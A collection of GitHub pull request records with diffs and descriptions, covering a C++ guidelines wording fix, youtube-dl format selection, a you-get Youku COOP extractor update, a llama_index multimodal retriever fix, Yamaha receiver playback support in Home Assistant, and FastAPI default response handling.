diff --git a/CppCoreGuidelines.md b/CppCoreGuidelines.md index fbbd9f5c8..51d0cd7be 100644 --- a/CppCoreGuidelines.md +++ b/CppCoreGuidelines.md @@ -464,7 +464,7 @@ Better: for (const auto& x : v) { /* do something with x */ } -Now, there is no explicit mention of the iteration mechanism, and the loop operates on a copy of elements so that accidental modification cannot happen. If modification is desired, say so: +Now, there is no explicit mention of the iteration mechanism, and the loop operates on a reference to `const` elements so that accidental modification cannot happen. If modification is desired, say so: for (auto& x : v) { /* do something with x */ }
https://api.github.com/repos/isocpp/CppCoreGuidelines/pulls/441
2015-12-10T12:48:05Z
2015-12-11T16:12:59Z
2015-12-11T16:12:59Z
2015-12-11T17:32:32Z
185
isocpp/CppCoreGuidelines
15,752
Make 'best' format only match non-DASH formats (closes #5554)
diff --git a/test/test_YoutubeDL.py b/test/test_YoutubeDL.py index bb4a65ee182..82b827536d7 100644 --- a/test/test_YoutubeDL.py +++ b/test/test_YoutubeDL.py @@ -237,7 +237,7 @@ def test_youtube_format_selection(self): f2['url'] = 'url:' + f2id info_dict = _make_result([f1, f2], extractor='youtube') - ydl = YDL() + ydl = YDL({'format': 'best/bestvideo'}) yie = YoutubeIE(ydl) yie._sort_formats(info_dict['formats']) ydl.process_ie_result(info_dict) @@ -245,7 +245,7 @@ def test_youtube_format_selection(self): self.assertEqual(downloaded['format_id'], f1id) info_dict = _make_result([f2, f1], extractor='youtube') - ydl = YDL() + ydl = YDL({'format': 'best/bestvideo'}) yie = YoutubeIE(ydl) yie._sort_formats(info_dict['formats']) ydl.process_ie_result(info_dict) diff --git a/youtube_dl/YoutubeDL.py b/youtube_dl/YoutubeDL.py index 827c88e0d9e..eee9c015435 100755 --- a/youtube_dl/YoutubeDL.py +++ b/youtube_dl/YoutubeDL.py @@ -915,7 +915,14 @@ def select_format(self, format_spec, available_formats): return None if format_spec == 'best' or format_spec is None: - return available_formats[-1] + audiovideo_formats = [ + f for f in available_formats + if f.get('vcodec') != 'none' and f.get('acodec') != 'none'] + if audiovideo_formats: + return audiovideo_formats[-1] + # for audio only urls, 'best' selects the best audio format + elif all(f.get('acodec') != 'none' for f in available_formats): + return available_formats[-1] elif format_spec == 'worst': audiovideo_formats = [ f for f in available_formats
Otherwise it's impossible to only download non-DASH formats, for example `best[height=?480]/best` would download a DASH video if it's the only one with height=480, instead for falling back to the second format specifier. For audio only urls (soundcloud, bandcamp ...), the best audio will be downloaded as before.
https://api.github.com/repos/ytdl-org/youtube-dl/pulls/5556
2015-04-29T20:57:40Z
2015-04-30T14:57:02Z
2015-04-30T14:57:02Z
2015-04-30T18:16:12Z
495
ytdl-org/youtube-dl
50,184
Acfun: Fix Youku COOP ct85&86
diff --git a/src/you_get/extractors/acfun.py b/src/you_get/extractors/acfun.py old mode 100644 new mode 100755 index e78d363627..983606d42f --- a/src/you_get/extractors/acfun.py +++ b/src/you_get/extractors/acfun.py @@ -8,7 +8,7 @@ from .qq import qq_download_by_vid from .sina import sina_download_by_vid from .tudou import tudou_download_by_iid -from .youku import youku_download_by_vid +from .youku import youku_download_by_vid, youku_open_download_by_vid import json, re @@ -32,14 +32,11 @@ def acfun_download_by_vid(vid, title, output_dir='.', merge=True, info_only=Fals elif sourceType == 'letv': letvcloud_download_by_vu(sourceId, '2d8c027396', title, output_dir=output_dir, merge=merge, info_only=info_only) elif sourceType == 'zhuzhan': - a = 'http://api.aixifan.com/plays/%s/realSource' % vid - s = json.loads(get_content(a, headers={'deviceType': '1'})) - urls = s['data']['files'][-1]['url'] - size = urls_size(urls) - print_info(site_info, title, 'mp4', size) - if not info_only: - download_urls(urls, title, 'mp4', size, - output_dir=output_dir, merge=merge) + a = 'http://api.aixifan.com/plays/%s' % vid + s = json.loads(get_content(a, headers={'deviceType': '2'})) + if s['data']['source'] == "zhuzhan-youku": + sourceId = s['data']['sourceId'] + youku_open_download_by_vid(client_id='908a519d032263f8', vid=sourceId, title=title, output_dir=output_dir, merge=merge, info_only=info_only, **kwargs) else: raise NotImplementedError(sourceType) diff --git a/src/you_get/extractors/youku.py b/src/you_get/extractors/youku.py index 3135e82251..fefaf5ee68 100644 --- a/src/you_get/extractors/youku.py +++ b/src/you_get/extractors/youku.py @@ -28,7 +28,11 @@ class Youku(VideoExtractor): f_code_1 = 'becaf9be' f_code_2 = 'bf7e5f01' + ctype = 12 #differ from 86 + def trans_e(a, c): + """str, str->str + This is an RC4 encryption.""" f = h = 0 b = list(range(256)) result = '' @@ -49,14 +53,14 @@ def trans_e(a, c): return result - def generate_ep(no, streamfileids, sid, token): + def generate_ep(self, no, streamfileids, sid, token): number = hex(int(str(no), 10))[2:].upper() if len(number) == 1: number = '0' + number fileid = streamfileids[0:8] + number + streamfileids[10:] ep = parse.quote(base64.b64encode( - ''.join(Youku.trans_e( - Youku.f_code_2, + ''.join(self.__class__.trans_e( + self.f_code_2, #use the 86 fcode if using 86 sid + '_' + fileid + '_' + token)).encode('latin1')), safe='~()*!.\'' ) @@ -150,8 +154,17 @@ def prepare(self, **kwargs): self.download_playlist_by_url(self.url, **kwargs) exit(0) - api_url = 'http://play.youku.com/play/get.json?vid=%s&ct=10' % self.vid - api12_url = 'http://play.youku.com/play/get.json?vid=%s&ct=12' % self.vid + #HACK! + if 'api_url' in kwargs: + api_url = kwargs['api_url'] #85 + api12_url = kwargs['api12_url'] #86 + self.ctype = kwargs['ctype'] + self.title = kwargs['title'] + + else: + api_url = 'http://play.youku.com/play/get.json?vid=%s&ct=10' % self.vid + api12_url = 'http://play.youku.com/play/get.json?vid=%s&ct=12' % self.vid + try: meta = json.loads(get_content( api_url, @@ -187,7 +200,8 @@ def prepare(self, **kwargs): else: log.wtf('[Failed] Video not found.') - self.title = data['video']['title'] + if not self.title: #86 + self.title = data['video']['title'] self.ep = data12['security']['encrypt_string'] self.ip = data12['security']['ip'] @@ -264,7 +278,7 @@ def extract(self, **kwargs): stream_id = self.streams_sorted[0]['id'] e_code = self.__class__.trans_e( - self.__class__.f_code_1, + self.f_code_1, base64.b64decode(bytes(self.ep, 'ascii')) ) sid, token = e_code.split('_') @@ -279,10 +293,10 @@ def extract(self, **kwargs): for no in range(0, len(segs)): k = segs[no]['key'] if k == -1: break # we hit the paywall; stop here - fileid, ep = self.__class__.generate_ep(no, streamfileid, + fileid, ep = self.__class__.generate_ep(self, no, streamfileid, sid, token) q = parse.urlencode(dict( - ctype = 12, + ctype = self.ctype, ev = 1, K = k, ep = parse.unquote(ep), @@ -312,9 +326,40 @@ def extract(self, **kwargs): if not kwargs['info_only']: self.streams[stream_id]['src'] = ksegs + def open_download_by_vid(self, client_id, vid, **kwargs): + """self, str, str, **kwargs->None + Override the original one with VideoExtractor. + Most of the credit are to @ERioK, who gave his POC.""" + self.f_code_1 = '10ehfkbv' #can be retrived by running r.translate with the keys and the list e + self.f_code_2 = 'msjv7h2b' + self.url = None + self.vid = vid + self.name = "优酷开放平台 (Youku COOP)" + + #A little bit of work before self.prepare + sign_url = "https://api.youku.com/players/custom.json?client_id={client_id}&video_id={video_id}".format(client_id = client_id, video_id = vid) + playsign = json.loads(get_content(sign_url))['playsign'] + + api85_url = 'http://play.youku.com/partner/get.json?cid={client_id}&vid={vid}&ct=85&sign={playsign}'.format(client_id = client_id, vid = vid, playsign = playsign) + api86_url = 'http://play.youku.com/partner/get.json?cid={client_id}&vid={vid}&ct=86&sign={playsign}'.format(client_id = client_id, vid = vid, playsign = playsign) + + self.prepare(api_url = api85_url, api12_url = api86_url, ctype = 86, **kwargs) + if 'extractor_proxy' in kwargs and kwargs['extractor_proxy']: + unset_proxy() + + try: + self.streams_sorted = [dict([('id', stream_type['id'])] + list(self.streams[stream_type['id']].items())) for stream_type in self.__class__.stream_types if stream_type['id'] in self.streams] + except: + self.streams_sorted = [dict([('itag', stream_type['itag'])] + list(self.streams[stream_type['itag']].items())) for stream_type in self.__class__.stream_types if stream_type['itag'] in self.streams] + + self.extract(**kwargs) + + self.download(**kwargs) + site = Youku() download = site.download_by_url download_playlist = site.download_playlist_by_url youku_download_by_vid = site.download_by_vid +youku_open_download_by_vid = site.open_download_by_vid # Used by: acfun.py bilibili.py miomio.py tudou.py
So long everyone. I apologize for the long delay due to unexpected physical and psychological conditions. Also I want to thank for @zhangn1985 's enlightening discussions and @soimort 's effort. Specially I give the credit to @ERioK 's POC which guided me through this patch. There are more people I want to thank then who I could remember. Thanks a lot. Beining ``` $ python3 you-get -di http://www.acfun.tv/v/ac2701527 [DEBUG] get_content: http://api.aixifan.com/plays/3462634 [DEBUG] get_content: https://api.youku.com/players/custom.json?client_id=908a519d032263f8&video_id=CMzQyMjc0NA== [DEBUG] get_content: http://play.youku.com/partner/get.json?cid=908a519d032263f8&vid=CMzQyMjc0NA==&ct=85&sign=MXwxNDYxODIxNTAyfDI0MzZkOTYwMDNlMTIwMDRlZTg1OTRhZTAzZjI0OTc5 [DEBUG] get_content: http://play.youku.com/partner/get.json?cid=908a519d032263f8&vid=CMzQyMjc0NA==&ct=86&sign=MXwxNDYxODIxNTAyfDI0MzZkOTYwMDNlMTIwMDRlZTg1OTRhZTAzZjI0OTc5 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0057203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2FieiMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=e7b5adeb3ee29562261efae3&yxon=1&ev=1&token=2412 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0157203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2FiaiMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=69adefdb458eb9f6261efae3&yxon=1&ev=1&token=2412 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0257203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2FiWiMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=47012544122ae5a5282b5f3e&yxon=1&ev=1&token=2412 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0357203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2FiSiMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=768415ccc619f0ae24129688&yxon=1&ev=1&token=2412 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0457203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2FiOiMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=0f4c8142e2146fd6282b5f3e&yxon=1&ev=1&token=2412 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0557203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2FiKiMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=a063d082ee92e290282b5f3e&yxon=1&ev=1&token=2412 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0657203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2FiGiMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=5e26320e138989f1261efae3&yxon=1&ev=1&token=2412 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0757203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2FiCiMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=e93aa4c00e75bbaf282b5f3e&yxon=1&ev=1&token=2412 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0857203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2Fi%2BiMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=25a3be5f1e829b20261efae3&yxon=1&ev=1&token=2412 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0957203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2Fi6iMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=58d1c740228579b924129688&yxon=1&ev=1&token=2412 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0A57203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2FlaiMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=3bc2288ce30f886b24129688&yxon=1&ev=1&token=2412 site: 优酷 (Youku) title: 马猴烧酒变身第三期 streams: # Available quality and codecs [ DEFAULT ] _________________________________ - format: hd2 container: flv video-profile: 超清 size: 389.0 MiB (407922611 bytes) # download-with: you-get --format=hd2 [URL] - format: mp4 container: mp4 video-profile: 高清 size: 223.9 MiB (234784857 bytes) # download-with: you-get --format=mp4 [URL] - format: flvhd container: flv video-profile: 标清 size: 120.2 MiB (126072622 bytes) # download-with: you-get --format=flvhd [URL] - format: 3gphd container: 3gp video-profile: 标清(3GP) size: 99.5 MiB (104342150 bytes) # download-with: you-get --format=3gphd [URL] ``` Proof of not breaking something else: ``` $ python3 you-get -di http://v.youku.com/v_show/id_XMTU1MDY0MTg4MA==.html [DEBUG] get_content: http://play.youku.com/play/get.json?vid=XMTU1MDY0MTg4MA==&ct=10 [DEBUG] get_content: http://play.youku.com/play/get.json?vid=XMTU1MDY0MTg4MA==&ct=12 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/146182110826612086532_00/st/flv/fileid/0300010100572158EEAE482FBE416E02DD9552-3701-5ECF-B0A2-6E41CB731195?ev=1&oip=1176176655&yxon=1&ep=cyaSG0GPV88A7SHZjj8bZyTkcXQNXP4J9h%2BFgNJjALshT%2Bq%2BnDaksuzFSvdAYItsdiMAZevz36Tub0UWYfNEqWkQ2jvbT%2FqS%2FoHh5asmwJFzFB41c8zesVSeSjP1&token=0934&K=8f7454d8aba2a1df24129688&ctype=12 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/146182110826612086532_00/st/flv/fileid/0300010100568BC189B4DD000032C8E64C9A66-35BF-D190-178B-E37C4F851173?ev=1&oip=1176176655&yxon=1&ep=cyaSG0GPV88A7SHZjj8bZyTkcXQNXP4J9h%2BFgNJjALshTuDN6j%2FZzu%2B0OotCFvkZcSB1GJ73r6PuG0YSYfNG2x4Qq0%2BhOfrh%2BfiR5dhQw%2BMEEBEzc8zQt1SeSjP1&token=0934&K=b13669cc4988e60b24129688&ctype=12 site: 优酷 (Youku) title: 实拍3名和尚寺庙内打架 住持发朋友圈:全开除 streams: # Available quality and codecs [ DEFAULT ] _________________________________ - format: hd2 container: flv video-profile: 超清 size: 13.9 MiB (14586247 bytes) # download-with: you-get --format=hd2 [URL] - format: mp4 container: mp4 video-profile: 高清 size: 7.6 MiB (7951724 bytes) # download-with: you-get --format=mp4 [URL] - format: flvhd container: flv video-profile: 标清 size: 3.9 MiB (4114669 bytes) # download-with: you-get --format=flvhd [URL] ``` <!-- Reviewable:start --> --- This change is [<img src="https://reviewable.io/review_button.svg" height="35" align="absmiddle" alt="Reviewable"/>](https://reviewable.io/reviews/soimort/you-get/1089) <!-- Reviewable:end -->
https://api.github.com/repos/soimort/you-get/pulls/1089
2016-04-28T05:41:07Z
2016-04-28T05:44:08Z
2016-04-28T05:44:08Z
2016-05-17T20:02:23Z
2,030
soimort/you-get
21,469
Solve Empty Text Vector Store with MM vector stores. Update MM docs
diff --git a/docs/module_guides/models/multi_modal.md b/docs/module_guides/models/multi_modal.md index b51dcec4e022e..166164bdf70d5 100644 --- a/docs/module_guides/models/multi_modal.md +++ b/docs/module_guides/models/multi_modal.md @@ -47,17 +47,23 @@ from llama_index import ( # Create a local Qdrant vector store client = qdrant_client.QdrantClient(path="qdrant_mm_db") +# if you only need image_store for image retrieval, +# you can remove text_sotre text_store = QdrantVectorStore( client=client, collection_name="text_collection" ) image_store = QdrantVectorStore( client=client, collection_name="image_collection" ) + +# if you only need image_store for image retrieval, +# don't need to pass text_store for StorageContext storage_context = StorageContext.from_defaults(vector_store=text_store) +# storage_context = StorageContext.from_defaults() -# Create the MultiModal index +# Load text and image documents from local folder documents = SimpleDirectoryReader("./data_folder/").load_data() - +# Create the MultiModal index index = MultiModalVectorStoreIndex.from_documents( documents, storage_context=storage_context, image_vector_store=image_store ) @@ -140,7 +146,7 @@ Below table lists some vector stores supporting Multi-Modal use cases. Our Llama ## Multi-Modal LLM Modules -We support integrations with GPT-4V, LLaVA, Fuyu-8B, CLIP, and more. +We support integrations with GPT4-V, CLIP (OpenAI), BLIP (Salesforce), and Replicate (LLaVA, Fuyu-8B, MiniGPT-4, CogVLM), and more. ```{toctree} --- diff --git a/llama_index/indices/multi_modal/retriever.py b/llama_index/indices/multi_modal/retriever.py index 3d7ad8bea3036..284a4a41fe556 100644 --- a/llama_index/indices/multi_modal/retriever.py +++ b/llama_index/indices/multi_modal/retriever.py @@ -117,10 +117,16 @@ def _retrieve( self, query_bundle: QueryBundle, ) -> List[NodeWithScore]: - res = self._text_retrieve(query_bundle) - # using text to image retrievel here for image retrieval - # users can also use image_to_image retrieval - res.extend(self._text_to_image_retrieve(query_bundle)) + res = [] + # If text vector store is not empty, retrieve text nodes + # If text vector store is empty, please create index without text vector store + if self._vector_store.stores_text: + res.extend(self._text_retrieve(query_bundle)) + + # If image vector store is not empty, retrieve text nodes + # If image vector store is empty, please create index without image vector store + if self._image_vector_store.stores_text: + res.extend(self._text_to_image_retrieve(query_bundle)) return res def _text_retrieve(
# Description * fix the MM vector store with only image store issue. Enable user only query image vector index without text vector index * update MM doc to reflect in the guideline. so user can only query image vector index Fixes # (issue) ## Type of Change Please delete options that are not relevant. - [x] Bug fix (non-breaking change which fixes an issue) - [ ] New feature (non-breaking change which adds functionality) - [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected) - [ ] This change requires a documentation update # How Has This Been Tested? Please describe the tests that you ran to verify your changes. Provide instructions so we can reproduce. Please also list any relevant details for your test configuration - [x] Added new unit/integration tests - [ ] Added new notebook (that tests end-to-end) - [ ] I stared at the code and made sure it makes sense # Suggested Checklist: - [ ] I have performed a self-review of my own code - [ ] I have commented my code, particularly in hard-to-understand areas - [ ] I have made corresponding changes to the documentation - [ ] I have added Google Colab support for the newly added notebooks. - [ ] My changes generate no new warnings - [ ] I have added tests that prove my fix is effective or that my feature works - [ ] New and existing unit tests pass locally with my changes - [ ] I ran `make format; make lint` to appease the lint gods
https://api.github.com/repos/run-llama/llama_index/pulls/9306
2023-12-05T03:41:18Z
2023-12-05T03:49:06Z
2023-12-05T03:49:05Z
2023-12-05T03:49:06Z
712
run-llama/llama_index
6,674
Improve support for Yamaha receiver
diff --git a/homeassistant/components/media_player/yamaha.py b/homeassistant/components/media_player/yamaha.py index 027fd6077309..9679c9f186c5 100644 --- a/homeassistant/components/media_player/yamaha.py +++ b/homeassistant/components/media_player/yamaha.py @@ -10,13 +10,15 @@ from homeassistant.components.media_player import ( SUPPORT_TURN_OFF, SUPPORT_TURN_ON, SUPPORT_VOLUME_MUTE, SUPPORT_VOLUME_SET, - SUPPORT_SELECT_SOURCE, SUPPORT_PLAY_MEDIA, + SUPPORT_SELECT_SOURCE, SUPPORT_PLAY_MEDIA, SUPPORT_PAUSE, SUPPORT_STOP, + SUPPORT_NEXT_TRACK, SUPPORT_PREVIOUS_TRACK, MEDIA_TYPE_MUSIC, MediaPlayerDevice, PLATFORM_SCHEMA) -from homeassistant.const import (CONF_NAME, CONF_HOST, STATE_OFF, STATE_ON) +from homeassistant.const import (CONF_NAME, CONF_HOST, STATE_OFF, STATE_ON, + STATE_PLAYING, STATE_IDLE) import homeassistant.helpers.config_validation as cv -REQUIREMENTS = ['rxv==0.2.0'] +REQUIREMENTS = ['rxv==0.3.0'] _LOGGER = logging.getLogger(__name__) @@ -24,6 +26,10 @@ SUPPORT_TURN_ON | SUPPORT_TURN_OFF | SUPPORT_SELECT_SOURCE | \ SUPPORT_PLAY_MEDIA +# Only supported by some sources +SUPPORT_PLAYBACK = SUPPORT_PLAY_MEDIA | SUPPORT_PAUSE | SUPPORT_STOP | \ + SUPPORT_PREVIOUS_TRACK | SUPPORT_NEXT_TRACK + CONF_SOURCE_NAMES = 'source_names' CONF_SOURCE_IGNORE = 'source_ignore' @@ -76,16 +82,25 @@ def __init__(self, name, receiver, source_ignore, source_names): self._source_ignore = source_ignore self._source_names = source_names self._reverse_mapping = None + self._is_playback_supported = False + self._play_status = None self.update() self._name = name self._zone = receiver.zone def update(self): """Get the latest details from the device.""" + self._play_status = self._receiver.play_status() if self._receiver.on: - self._pwstate = STATE_ON + if self._play_status is None: + self._pwstate = STATE_ON + elif self._play_status.playing: + self._pwstate = STATE_PLAYING + else: + self._pwstate = STATE_IDLE else: self._pwstate = STATE_OFF + self._muted = self._receiver.mute self._volume = (self._receiver.volume / 100) + 1 @@ -95,6 +110,8 @@ def update(self): current_source = self._receiver.input self._current_source = self._source_names.get( current_source, current_source) + self._is_playback_supported = self._receiver.is_playback_supported( + self._current_source) def build_source_list(self): """Build the source list.""" @@ -143,7 +160,10 @@ def source_list(self): @property def supported_media_commands(self): """Flag of media commands that are supported.""" - return SUPPORT_YAMAHA + supported_commands = SUPPORT_YAMAHA + if self._is_playback_supported: + supported_commands |= SUPPORT_PLAYBACK + return supported_commands def turn_off(self): """Turn off media player.""" @@ -164,6 +184,34 @@ def turn_on(self): self._receiver.on = True self._volume = (self._receiver.volume / 100) + 1 + def media_play(self): + """Send play commmand.""" + self._call_playback_function(self._receiver.play, "play") + + def media_pause(self): + """Send pause command.""" + self._call_playback_function(self._receiver.pause, "pause") + + def media_stop(self): + """Send stop command.""" + self._call_playback_function(self._receiver.stop, "stop") + + def media_previous_track(self): + """Send previous track command.""" + self._call_playback_function(self._receiver.previous, "previous track") + + def media_next_track(self): + """Send next track command.""" + self._call_playback_function(self._receiver.next, "next track") + + def _call_playback_function(self, function, function_text): + import rxv + try: + function() + except rxv.exceptions.ResponseException: + _LOGGER.warning( + 'Failed to execute %s on %s', function_text, self._name) + def select_source(self, source): """Select input source.""" self._receiver.input = self._reverse_mapping.get(source, source) @@ -179,23 +227,36 @@ def play_media(self, media_type, media_id, **kwargs): if media_type == "NET RADIO": self._receiver.net_radio(media_id) + @property + def media_artist(self): + """Artist of current playing media.""" + if self._play_status is not None: + return self._play_status.artist + + @property + def media_album_name(self): + """Album of current playing media.""" + if self._play_status is not None: + return self._play_status.album + @property def media_content_type(self): - """Return the media content type.""" - if self.source == "NET RADIO": + """Content type of current playing media.""" + # Loose assumption that if playback is supported, we are playing music + if self._is_playback_supported: return MEDIA_TYPE_MUSIC + return None @property def media_title(self): - """Return the media title. - - This will vary by input source, as they provide different - information in metadata. - - """ - if self.source == "NET RADIO": - info = self._receiver.play_status() - if info.song: - return "%s: %s" % (info.station, info.song) + """Artist of current playing media.""" + if self._play_status is not None: + song = self._play_status.song + station = self._play_status.station + + # If both song and station is available, print both, otherwise + # just the one we have. + if song and station: + return '{}: {}'.format(station, song) else: - return info.station + return song or station diff --git a/requirements_all.txt b/requirements_all.txt index e8d7a6719432..03f8715ab221 100644 --- a/requirements_all.txt +++ b/requirements_all.txt @@ -447,7 +447,7 @@ radiotherm==1.2 # rpi-rf==0.9.5 # homeassistant.components.media_player.yamaha -rxv==0.2.0 +rxv==0.3.0 # homeassistant.components.media_player.samsungtv samsungctl==0.5.1
**Description:** This pull request adds support for basic playback functionality like play, pause, stop, next and previous for input sources that support it in the Yamaha receiver. It also adds support for media title, artist and album if the information is available. **Checklist:** If user exposed functionality or configuration variables are added/changed: - [x] Documentation added/updated in [home-assistant.github.io](https://github.com/home-assistant/home-assistant.github.io) If the code communicates with devices, web services, or third-party tools: - [x] New dependencies have been added to the `REQUIREMENTS` variable ([example](https://github.com/home-assistant/home-assistant/blob/dev/homeassistant/components/keyboard.py#L16)). - [x] New dependencies have been added to `requirements_all.txt` by running `script/gen_requirements_all.py`.
https://api.github.com/repos/home-assistant/core/pulls/3985
2016-10-22T07:25:04Z
2016-11-02T01:50:03Z
2016-11-02T01:50:03Z
2017-03-17T17:10:37Z
1,549
home-assistant/core
39,242
Fix default extra response
diff --git a/fastapi/openapi/models.py b/fastapi/openapi/models.py index ddc5c6847f917..3dd9f04dc8385 100644 --- a/fastapi/openapi/models.py +++ b/fastapi/openapi/models.py @@ -210,10 +210,6 @@ class Response(BaseModel): links: Optional[Dict[str, Union[Link, Reference]]] = None -class Responses(BaseModel): - default: Response - - class Operation(BaseModel): tags: Optional[List[str]] = None summary: Optional[str] = None @@ -222,7 +218,7 @@ class Operation(BaseModel): operationId: Optional[str] = None parameters: Optional[List[Union[Parameter, Reference]]] = None requestBody: Optional[Union[RequestBody, Reference]] = None - responses: Union[Responses, Dict[str, Response]] + responses: Dict[str, Response] # Workaround OpenAPI recursive reference callbacks: Optional[Dict[str, Union[Dict[str, Any], Reference]]] = None deprecated: Optional[bool] = None diff --git a/fastapi/openapi/utils.py b/fastapi/openapi/utils.py index 2ee8c241cd334..c3cc120fd6eca 100644 --- a/fastapi/openapi/utils.py +++ b/fastapi/openapi/utils.py @@ -49,7 +49,7 @@ "3XX": "Redirection", "4XX": "Client Error", "5XX": "Server Error", - "default": "Default Response", + "DEFAULT": "Default Response", } @@ -205,9 +205,10 @@ def get_openapi_path( response.setdefault( "description", status_text or "Additional Response" ) - operation.setdefault("responses", {})[ - str(additional_status_code).upper() - ] = response + status_code_key = str(additional_status_code).upper() + if status_code_key == "DEFAULT": + status_code_key = "default" + operation.setdefault("responses", {})[status_code_key] = response status_code = str(route.status_code) response_schema = {"type": "string"} if lenient_issubclass(route.response_class, JSONResponse): diff --git a/tests/test_additional_responses_router.py b/tests/test_additional_responses_router.py index ce66ead7e0c71..028026e67fea7 100644 --- a/tests/test_additional_responses_router.py +++ b/tests/test_additional_responses_router.py @@ -26,6 +26,7 @@ async def b(): responses={ "400": {"description": "Error with str"}, "5xx": {"description": "Error with range, lower"}, + "default": {"description": "A default response"}, }, ) async def c(): @@ -74,6 +75,7 @@ async def c(): "description": "Successful Response", "content": {"application/json": {"schema": {}}}, }, + "default": {"description": "A default response"}, }, "summary": "C", "operationId": "c_c_get",
Fix `"default"` extra response, when combined with responses with status codes and status code ranges. Continuation of #435.
https://api.github.com/repos/tiangolo/fastapi/pulls/489
2019-08-30T21:25:15Z
2019-08-30T21:34:48Z
2019-08-30T21:34:48Z
2019-08-30T21:34:51Z
692
tiangolo/fastapi
23,248
Show --check-status warning with --quiet as well
